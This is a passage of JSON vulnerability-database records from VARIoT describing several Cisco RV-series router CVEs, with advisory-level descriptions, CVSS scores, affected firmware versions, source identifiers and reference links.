"id": "CVE-2018-0424"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180905-rv-routers-injection"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1041677"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0424"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-0424"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18073"
},
{
"db": "VULHUB",
"id": "VHN-118626"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010839"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-263"
},
{
"db": "NVD",
"id": "CVE-2018-0424"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-18073"
},
{
"db": "VULHUB",
"id": "VHN-118626"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010839"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-263"
},
{
"db": "NVD",
"id": "CVE-2018-0424"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-18073"
},
{
"date": "2018-10-05T00:00:00",
"db": "VULHUB",
"id": "VHN-118626"
},
{
"date": "2018-12-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010839"
},
{
"date": "2018-09-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-263"
},
{
"date": "2018-10-05T14:29:00.967000",
"db": "NVD",
"id": "CVE-2018-0424"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-18073"
},
{
"date": "2020-08-28T00:00:00",
"db": "VULHUB",
"id": "VHN-118626"
},
{
"date": "2018-12-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010839"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-263"
},
{
"date": "2024-11-21T03:38:12.013000",
"db": "NVD",
"id": "CVE-2018-0424"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-263"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Command injection vulnerability in the product",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010839"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-263"
}
],
"trust": 0.6
}
}
var-202108-0848
Vulnerability from variot
A vulnerability in the Universal Plug-and-Play (UPnP) service of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of incoming UPnP traffic. An attacker could exploit this vulnerability by sending a crafted UPnP request to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a DoS condition. Cisco has not released software updates that address this vulnerability. plural Cisco Small Business Router There is an input validation vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Cisco Small Business is a switch of Cisco (Cisco)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202108-0848",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv130 vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "application extension platform",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.55"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
"version": null
},
{
"model": "cisco rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
"version": null
},
{
"model": "rv130 vpn router",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
"version": null
},
{
"model": "application extension platform",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010406"
},
{
"db": "NVD",
"id": "CVE-2021-34730"
}
]
},
"cve": "CVE-2021-34730",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2021-34730",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-394972",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2021-34730",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-34730",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-34730",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "ykramarz@cisco.com",
"id": "CVE-2021-34730",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2021-34730",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-202108-1644",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-394972",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-34730",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-394972"
},
{
"db": "VULMON",
"id": "CVE-2021-34730"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010406"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1644"
},
{
"db": "NVD",
"id": "CVE-2021-34730"
},
{
"db": "NVD",
"id": "CVE-2021-34730"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the Universal Plug-and-Play (UPnP) service of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of incoming UPnP traffic. An attacker could exploit this vulnerability by sending a crafted UPnP request to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a DoS condition. Cisco has not released software updates that address this vulnerability. plural Cisco Small Business Router There is an input validation vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Cisco Small Business is a switch of Cisco (Cisco)",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-34730"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010406"
},
{
"db": "VULHUB",
"id": "VHN-394972"
},
{
"db": "VULMON",
"id": "CVE-2021-34730"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-34730",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010406",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1644",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.2808",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-394972",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-34730",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-394972"
},
{
"db": "VULMON",
"id": "CVE-2021-34730"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010406"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1644"
},
{
"db": "NVD",
"id": "CVE-2021-34730"
}
]
},
"id": "VAR-202108-0848",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-394972"
}
],
"trust": 0.633139435
},
"last_update_date": "2024-08-14T14:50:12.489000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-cisco-sb-rv-overflow-htpymMB5",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cisco-sb-rv-overflow-htpymMB5"
},
{
"title": "Cisco Small Business Enter the fix for the verification error vulnerability",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=160198"
},
{
"title": "Cisco: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Remote Command Execution and Denial of Service Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-cisco-sb-rv-overflow-htpymMB5"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Live-Hack-CVE/CVE-2021-34730 "
},
{
"title": "alonzzzo",
"trust": 0.1,
"url": "https://github.com/Alonzozzz/alonzzzo "
},
{
"title": "PoC",
"trust": 0.1,
"url": "https://github.com/Jonathan-Elias/PoC "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/khulnasoft-lab/awesome-security "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/critical-cisco-bug-routers-unpatched/168831/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/cisco-won-t-fix-zero-day-rce-vulnerability-in-end-of-life-vpn-routers/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-34730"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010406"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1644"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Inappropriate input confirmation (CWE-20) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-394972"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010406"
},
{
"db": "NVD",
"id": "CVE-2021-34730"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-cisco-sb-rv-overflow-htpymmb5"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-34730"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2808"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2021-34730"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://threatpost.com/critical-cisco-bug-routers-unpatched/168831/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-394972"
},
{
"db": "VULMON",
"id": "CVE-2021-34730"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010406"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1644"
},
{
"db": "NVD",
"id": "CVE-2021-34730"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-394972"
},
{
"db": "VULMON",
"id": "CVE-2021-34730"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010406"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1644"
},
{
"db": "NVD",
"id": "CVE-2021-34730"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-18T00:00:00",
"db": "VULHUB",
"id": "VHN-394972"
},
{
"date": "2021-08-18T00:00:00",
"db": "VULMON",
"id": "CVE-2021-34730"
},
{
"date": "2022-06-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-010406"
},
{
"date": "2021-08-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-1644"
},
{
"date": "2021-08-18T20:15:07.447000",
"db": "NVD",
"id": "CVE-2021-34730"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-10-27T00:00:00",
"db": "VULHUB",
"id": "VHN-394972"
},
{
"date": "2022-10-27T00:00:00",
"db": "VULMON",
"id": "CVE-2021-34730"
},
{
"date": "2022-06-30T08:57:00",
"db": "JVNDB",
"id": "JVNDB-2021-010406"
},
{
"date": "2022-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-1644"
},
{
"date": "2023-11-07T03:36:14.030000",
"db": "NVD",
"id": "CVE-2021-34730"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-1644"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco\u00a0Small\u00a0Business\u00a0Router\u00a0 Input verification vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010406"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-1644"
}
],
"trust": 0.6
}
}
var-201606-0433
Vulnerability from variot
Buffer overflow in the web-based management interface on Cisco RV110W devices with firmware before 1.2.1.7, RV130W devices with firmware before 1.0.3.16, and RV215W devices with firmware before 1.3.0.8 allows remote authenticated users to cause a denial of service (device reload) via crafted configuration commands in an HTTP request, aka Bug ID CSCux82523. The Cisco RV130WWireless-N is a versatile VPN router; the Cisco RV110W/RV215W is a router that combines wired/wireless network connectivity, VPN, and firewall. Multiple Cisco Products are prone to a denial-of-service vulnerability. Attackers can exploit this issue to reload the affected device, denying service to legitimate users. This issue is being tracked by Cisco bug IDs CSCux82523, CSCux82531 and CSCux82536
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201606-0433",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.6"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.15"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.2.7"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.9"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.0.21"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.1.3"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.3.0.7"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.1.4"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.9"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.14"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.10"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.5"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.0.3.16"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04094"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003299"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-366"
},
{
"db": "NVD",
"id": "CVE-2016-1397"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003299"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco would like to thank security researcher Samuel Huntley for finding and reporting this vulnerability.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-366"
}
],
"trust": 0.6
},
"cve": "CVE-2016-1397",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CVE-2016-1397",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CNVD-2016-04094",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "VHN-90216",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2016-1397",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-1397",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2016-1397",
"trust": 0.8,
"value": "Medium"
},
{
